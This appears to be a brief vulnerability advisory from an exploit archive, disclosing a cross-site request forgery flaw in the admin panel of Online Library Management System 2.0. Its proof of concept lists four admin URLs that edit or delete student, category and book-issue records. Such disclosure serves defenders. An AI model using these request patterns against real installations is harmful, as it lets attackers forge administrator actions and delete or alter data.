Online Library Management System 2.0 Cross Site Request Forgery

Online Library Management System version 2.0 suffers from a cross site request forgery vulnerability.


MD5 | adc60506bac13f286946361e3c61231f

# Exploit Title: Online Library Management System
# Date:15/06/2021
# Exploit Author : Mohit Dabas
# Vendor Homepage : https://phpgurukul.com
# Software Link : https://phpgurukul.com/online-library-management-system/
# Version: 2.0
# Tested on : LAMPP

# Description #

Online Library Management System has got CSRF in admin panel .Wherever the admin can update or delete option the CSRF exists.
Following are the Example URLs

# Proof of Concept (PoC) : Exploit #

http://127.0.0.1:8080/library/admin/reg-students.php?id=12
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6

Related Posts